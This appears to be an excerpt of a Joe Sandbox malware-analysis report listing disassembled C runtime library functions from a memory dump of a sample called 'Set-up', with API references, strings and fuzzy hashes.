wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6BB71042
_errno.MSVCR100 ref: 6BB7104F
_invalid_parameter_noinfo.MSVCR100 ref: 6BB7105A
free.MSVCR100(?), ref: 6BB71075
free.MSVCR100(?), ref: 6BB71097

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
String ID:
API String ID: 928254730-0
Opcode ID: 5035eb310478410b6f37efd5bca112bd25009658f654a473cece3996eb18fe7e
Instruction ID: 36fadf541b9648a0795c61022ee03332fd9e17ccf663d78f5e9bae037bb861cd
Opcode Fuzzy Hash: 5035eb310478410b6f37efd5bca112bd25009658f654a473cece3996eb18fe7e
Instruction Fuzzy Hash: 5E51F6329062A4BECB225EB48C86DDF3B6CEF46B74F204565F02496194EB3DC650D7B2

Function 6BB57B2C Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_FindAndUnlinkFrame.MSVCR100(?), ref: 6BB57B42

Part of subcall function 6BB57840: _getptd.MSVCR100 ref: 6BB57846
Part of subcall function 6BB57840: _getptd.MSVCR100 ref: 6BB5785A

_getptd.MSVCR100 ref: 6BB57B58
_getptd.MSVCR100 ref: 6BB57B67
_getptd.MSVCR100 ref: 6BB57B78
_getptd.MSVCR100 ref: 6BB57B8C
_IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6BB57B9A

Part of subcall function 6BB57C17: _getptd.MSVCR100(?,6BB57B9F,?), ref: 6BB57C1C

_getptd.MSVCR100(00000001), ref: 6BB57BA6
__DestructExceptionObject.MSVCR100(?,00000001), ref: 6BB57BB1
_getptd.MSVCR100 ref: 6BB57BB8
_getptd.MSVCR100 ref: 6BB57BC7
_getptd.MSVCR100 ref: 6BB57BD8
_getptd.MSVCR100 ref: 6BB57BF6
_getptd.MSVCR100 ref: 6BB57C04
_getptd.MSVCR100 ref: 6BB6CA49
_getptd.MSVCR100 ref: 6BB6CA61

Strings

csm, xrefs: 6BB57B4C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
String ID: csm
API String ID: 473968603-1018135373
Opcode ID: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
Instruction ID: 2865d3c93013cdceca7778e3b5f79d972f2dd470d4a89a8c017877f253cde938
Opcode Fuzzy Hash: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
Instruction Fuzzy Hash: 92313C316092C0CFC600AF66C445E5D37A5FF91229F85C4F5D4898B936CF79D990DB62

Function 6BB535D0 Relevance: 33.2, APIs: 22, Instructions: 192COMMON

Download Yara Rule

APIs

wcsrchr.MSVCR100(?,0000005C), ref: 6BB5360D
wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB53617
wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB53636
_waccess_s.MSVCR100(?,00000000), ref: 6BB5364A
_errno.MSVCR100 ref: 6BB5367D
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6833A
wcschr.MSVCR100(?,0000003A), ref: 6BB6834A
_wcslen.LIBCMT(?), ref: 6BB6835C
_calloc_crt.MSVCR100(00000003,00000002,?), ref: 6BB68367
wcscpy_s.MSVCR100(00000000,00000003,6BB73048), ref: 6BB6837F
wcscat_s.MSVCR100(00000000,00000003,?), ref: 6BB6838E

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_s_wcslenwcscat_swcschrwcscpy_s
String ID:
API String ID: 255226058-0
Opcode ID: 21622cbb801d5fe635011b17ab5649e9c883b55ce3782ab4edc7d97ea9023845
Instruction ID: 62fb006152af348c81a48e4acb8e1a5193423499a305420bd978fd4362cb2193
Opcode Fuzzy Hash: 21622cbb801d5fe635011b17ab5649e9c883b55ce3782ab4edc7d97ea9023845
Instruction Fuzzy Hash: 4951E632C04295BADB219F75CC42A5E3774FF06794F4001A9FD11A6398FB3DCD20AA62

Function 6BB52614 Relevance: 31.7, APIs: 21, Instructions: 218COMMON

Download Yara Rule

APIs

_mbschr.MSVCR100(00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB5263B

Part of subcall function 6BB525FD: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6BB52640,00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB5260A

free.MSVCR100(?,00000000,00000000,74DEDFF0), ref: 6BB526A2
_errno.MSVCR100(00000000,00000000,74DEDFF0), ref: 6BB526B4
_errno.MSVCR100(74DEDFF0), ref: 6BB71B83
_invalid_parameter_noinfo.MSVCR100(74DEDFF0), ref: 6BB71B8E
___wtomb_environ.LIBCMT ref: 6BB71BB7

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
String ID:
API String ID: 679965329-0
Opcode ID: 95ddfa47321cf120b668ff2051cbabf3eb12da6920fee301eeb969807407db50
Instruction ID: 1c325c9357a994fced7881f440e3e7206e1f3ff592dde389d65d928ca237eeb3
Opcode Fuzzy Hash: 95ddfa47321cf120b668ff2051cbabf3eb12da6920fee301eeb969807407db50
Instruction Fuzzy Hash: 3361E3B3904291EFDB24AFB8C8D19AD77B0FF05314B1405BDD620AB2A0EB39D941CB52

Function 6BB4F334 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB4F313
DName::operator+.LIBCMT ref: 6BB4F31A
DName::operator+.LIBCMT ref: 6BB4F3A0
DName::DName.LIBCMT ref: 6BB6E92B
DName::operator+.LIBCMT ref: 6BB6E932

Strings

`anonymous namespace', xrefs: 6BB6EA61

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: `anonymous namespace'
API String ID: 168861036-3062148218
Opcode ID: e4e3a818c4e1efed40f8d6bd56576fa3c6bfffaaba4c192b371b369658715055
Instruction ID: 9c95989ec440916826b000fcdcf9814ab9a1971d310424d3e177825800dce842
Opcode Fuzzy Hash: e4e3a818c4e1efed40f8d6bd56576fa3c6bfffaaba4c192b371b369658715055
Instruction Fuzzy Hash: A6816C719442C8AFDB10CFA8D841AEDBBF8FF05344F44446EE5999B258EB38AD45DB10

Function 6BB4F9A4 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 233COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB6D3AE
DName::DName.LIBCMT ref: 6BB6D3E3
atol.MSVCR100(6BB4F99F,6BB4F99F,00000010,FFFF0000,00000000,00000000), ref: 6BB6D46D

Strings

NULL, xrefs: 6BB6D3A7
., xrefs: 6BB6D35A
., xrefs: 6BB6D360
`template-parameter, xrefs: 6BB6D498
`non-type-template-parameter, xrefs: 6BB6D4BF

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::$atol
String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
API String ID: 2083219425-3945972591
Opcode ID: 54b89d81f6420252185ca97f5c0dc8387ead05d3a335dff45e4fdd06834925db
Instruction ID: 0f2e3acbf2e89e99800d1103f28225a15199f6946e5112b16c1c9c30b6db7cb1
Opcode Fuzzy Hash: 54b89d81f6420252185ca97f5c0dc8387ead05d3a335dff45e4fdd06834925db
Instruction Fuzzy Hash: D871A2729842C8AADF10DBB8EC95FED7778BB41748F6004AAE10997094EF7C9D44DB12

Function 6BB568DC Relevance: 28.8, APIs: 19, Instructions: 273COMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,000000FF,00000024), ref: 6BB56905
_get_daylight.MSVCR100(?), ref: 6BB56941
_get_dstbias.MSVCR100(?), ref: 6BB56953
_get_timezone.MSVCR100(?), ref: 6BB56965
_gmtime64_s.MSVCR100(?,?), ref: 6BB56999
_errno.MSVCR100 ref: 6BB569BF
_gmtime64_s.MSVCR100(?,?), ref: 6BB569CB
_errno.MSVCR100 ref: 6BB69DE1
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69DEB
_errno.MSVCR100 ref: 6BB69DF7
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69E01
_gmtime64_s.MSVCR100(?,?), ref: 6BB69E3A
__allrem.LIBCMT ref: 6BB69EA5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB69EC1
__allrem.LIBCMT ref: 6BB69ED8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB69EF6
__allrem.LIBCMT ref: 6BB69F0D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
String ID:
API String ID: 3568092448-0
Opcode ID: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
Instruction ID: c35a48c690be6233ffdc6fe0055a5d90731548e67dbcd2bc8da15a86b00999dd
Opcode Fuzzy Hash: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
Instruction Fuzzy Hash: 3E810472A047819BE7108F78CC81B9E73F9EF89768F15452AE551D7281FB78ED008B52

Function 6BB7BAE2 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111memorylibraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB7BAE9
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6BB7BAB4,00000000,6BBE462C,0000000C,6BB8018B,45C8E9F0,?,?), ref: 6BB7BB19
InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6BB7BB58
TlsAlloc.KERNEL32 ref: 6BB7BB62
GetLastError.KERNEL32 ref: 6BB7BB70
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7BB88
_CxxThrowException.MSVCR100(6BB4BD3C,6BB4BDD8,?,00000001), ref: 6BB7BB96
GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6BB7BBA9
GetProcAddress.KERNEL32(00000000), ref: 6BB7BBB0
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6BB7BBE3
std::exception::exception.LIBCMT(?,00000001), ref: 6BB7BC03
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BB7BC30
??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB7BC4B

Strings

FlushProcessWriteBuffers, xrefs: 6BB7BB9B
kernel32.dll, xrefs: 6BB7BBA0
bad allocation, xrefs: 6BB7BBFC

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
API String ID: 2685218194-103648123
Opcode ID: 42ae0e880d74b081d351aede00f54b1c98b77e01c661b5dde764ce99aa2203ff
Instruction ID: 87bdac79b527885d0b9b892b9f8608498b2fb5bdcf39c774a3ec5a2a2479e109
Opcode Fuzzy Hash: 42ae0e880d74b081d351aede00f54b1c98b77e01c661b5dde764ce99aa2203ff
Instruction Fuzzy Hash: F44129B09006A6EFCB20AF65C989A9DBFB8FF09750F00855AE525D7640C7B9A154CFE0

Function 6BB77862 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 247timeCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCR100(?,6BBDFE78), ref: 6BB778C7

Part of subcall function 6BB577D4: RaiseException.KERNEL32(?,?,6BB6F317,?,?,?,?,?,6BB6F317,?,6BB4BDD8,6BBE7580), ref: 6BB57813

std::exception::exception.LIBCMT ref: 6BB77901
?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,45C8E9F0,00000000,6BB75CBE,6BB75C86), ref: 6BB7791C
std::exception::exception.LIBCMT ref: 6BB778B0

Part of subcall function 6BBB3502: std::exception::_Copy_str.LIBCMT(6BB82171,?,?,6BB82171,6BB81FE2,?,6BB81FE2,00000001), ref: 6BBB351D

std::exception::exception.LIBCMT ref: 6BB77956
??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,45C8E9F0,?,00000000,45C8E9F0,00000000,6BB75CBE,6BB75C86), ref: 6BB779BF

Part of subcall function 6BB7B030: __EH_prolog3.LIBCMT ref: 6BB7B037

?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB77A30
?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB77A85
?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(00000002,6BB77DE5,45C8E9F0,000000FF,00000000,00000020), ref: 6BB77AEE
CreateTimerQueueTimer.KERNEL32(45C8EA00,00000000,6BB77DE5,45C8E9F0,000000FF,00000000,00000020), ref: 6BB77AF9
std::exception::exception.LIBCMT(?,00000001), ref: 6BB77B15
?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6BB77B37

Strings

pEvents, xrefs: 6BB778A8, 6BB778F9, 6BB7794E
bad allocation, xrefs: 6BB77B0D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
String ID: bad allocation$pEvents
API String ID: 3019020058-4135266256
Opcode ID: 64191527c05946fbfefd0c1536da9a480a8989b66e75db6605969a441f84803a
Instruction ID: 820d4415da5a7da810c006bcff27db0a954c841261071a9ccdb7b5146ef13b14
Opcode Fuzzy Hash: 64191527c05946fbfefd0c1536da9a480a8989b66e75db6605969a441f84803a
Instruction Fuzzy Hash: 5DA167715083819FC730EF26C880A9EB7E4FB85314F104ABDE5B587290DBB8E945CB92

Function 6BB7C337 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C371
_memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C37D
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C394
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C3B2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6BB7BC2C), ref: 6BB7C3DA
GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB7C3E1
_memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB7BC2C), ref: 6BB7C3FD
??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB7BC2C), ref: 6BB7C41D
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C468
_memset.LIBCMT(00000000,00000000,6BB75C86,00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C479
??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,6BB75C86,00000000,00000000,?,?,6BB7BC2C), ref: 6BB7C490
free.MSVCR100(?,?,?,?,?,00000000,?,?,6BB7BC2C), ref: 6BB7C5A1

Strings

$, xrefs: 6BB7C513
$, xrefs: 6BB7C582

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _memset$Process$AffinityCurrentMaskfree
String ID: $$$
API String ID: 3179535153-233714265
Opcode ID: 101e147dd81d7bac9bb207658ebc37e72b54d1e2b3e3fb03604d02484576e333
Instruction ID: f874c1fcb0076d27eaa1240fd07392695785e8eeae8fc80bb48358b4d67e0d18
Opcode Fuzzy Hash: 101e147dd81d7bac9bb207658ebc37e72b54d1e2b3e3fb03604d02484576e333
Instruction Fuzzy Hash: 828114B0A00654EFDB24DF68C9918ADB7F4FF0934070054AEE816DBA51D7B6EA52CF90

Function 6BB458A9 Relevance: 24.2, APIs: 16, Instructions: 234stringCOMMON

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 6BB457BE
memcmp.MSVCR100(?,000000FE), ref: 6BB4587C
_getptd.MSVCR100(00000001,00000000), ref: 6BB458D1
__expandlocale.LIBCMT ref: 6BB458F9

Part of subcall function 6BB44CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB44D2F
Part of subcall function 6BB44CF9: strcpy_s.MSVCR100(00000000,00000000,6BB44DD8,00000000,00000000,00000005), ref: 6BB44D9D

strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6BB45918
_strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6BB4592E
_malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6BB4593D

Part of subcall function 6BB40CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40CE5

memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB4598B
strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB459B4
memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB459EE
_CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB45A1A
InterlockedDecrement.KERNEL32(00000000), ref: 6BB45A43
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6BB70C64

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
String ID:
API String ID: 986606718-0
Opcode ID: 1158b9f62d9a1097158cc1333a406a676ad1a939e838efb0f8165b0a6ceeb9a6
Instruction ID: fd2b7bd831adb65a59fea3b6826b017cfc9a8f01604af5edfef32fc371996c4f
Opcode Fuzzy Hash: 1158b9f62d9a1097158cc1333a406a676ad1a939e838efb0f8165b0a6ceeb9a6
Instruction Fuzzy Hash: 56A11571A006599FDB25CF28C881BEAB7B5FF09304F1044EAE90DE7254EB35AA80DF50

Function 6BB5373E Relevance: 24.2, APIs: 16, Instructions: 198processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT(?,00000000,00000044), ref: 6BB53786
_calloc_crt.MSVCR100(?,00000001), ref: 6BB537E4
__doserrno.MSVCR100 ref: 6BB5384A
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 6BB5386E
GetLastError.KERNEL32 ref: 6BB53876
free.MSVCR100(?), ref: 6BB53881

Part of subcall function 6BB4014E: HeapFree.KERNEL32(00000000,00000000,?,6BB67602,00000000), ref: 6BB40164

WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BB538A9
GetExitCodeProcess.KERNEL32(?,?), ref: 6BB538B6
CloseHandle.KERNEL32(?), ref: 6BB538C2
CloseHandle.KERNEL32(?), ref: 6BB538C7
__dosmaperr.LIBCMT(00000000), ref: 6BB682FB
_exit.MSVCR100(00000000), ref: 6BB68304

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFreeHeapLastObjectSingleWait__doserrno__dosmaperr_calloc_crt_exit_memsetfree
String ID:
API String ID: 2263466040-0
Opcode ID: f4790f07ac9730e2799aabde70d12bcc8150c5dd47dc6fe2813939584984e918
Instruction ID: 8471d926c74f7711679bf14cf3fbeac2ab673c78ab45cdf99ac0564754e01f2b
Opcode Fuzzy Hash: f4790f07ac9730e2799aabde70d12bcc8150c5dd47dc6fe2813939584984e918
Instruction Fuzzy Hash: 32613472D042D89FDF219FA8CC81ADD7BB9EF06314F1441A6E012AB2A0E779CD45CB52

Function 6BB42891 Relevance: 24.2, APIs: 16, Instructions: 165COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB4CBC5
_fileno.MSVCR100(?), ref: 6BB4CBD5
_fileno.MSVCR100(?), ref: 6BB4CBE5
_fileno.MSVCR100(?,?), ref: 6BB4CBF5
_fileno.MSVCR100(?), ref: 6BB4CC19
_fileno.MSVCR100(?), ref: 6BB4CC29
_fileno.MSVCR100(?), ref: 6BB4CC39
_fileno.MSVCR100(?,?), ref: 6BB4CC49
isleadbyte.MSVCR100(?), ref: 6BB4CC86
__fassign.LIBCMT(?,00000000,00000001), ref: 6BB4CC9D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _fileno$__fassignisleadbyte
String ID:
API String ID: 3459433188-0
Opcode ID: b1423e8e439fe9d3b98937ef2d79fb41e3edc493cdf0b960025c913edcdabf1f
Instruction ID: 9e246509d5d0e26534a90737d78cf95731cb723b2b2dc512bba14afc4e91e470
Opcode Fuzzy Hash: b1423e8e439fe9d3b98937ef2d79fb41e3edc493cdf0b960025c913edcdabf1f
Instruction Fuzzy Hash: A7514972005AD09EC3164F38D84156E37B8EF13B38720069EE4B58B1D5EB3CDA5AEB95

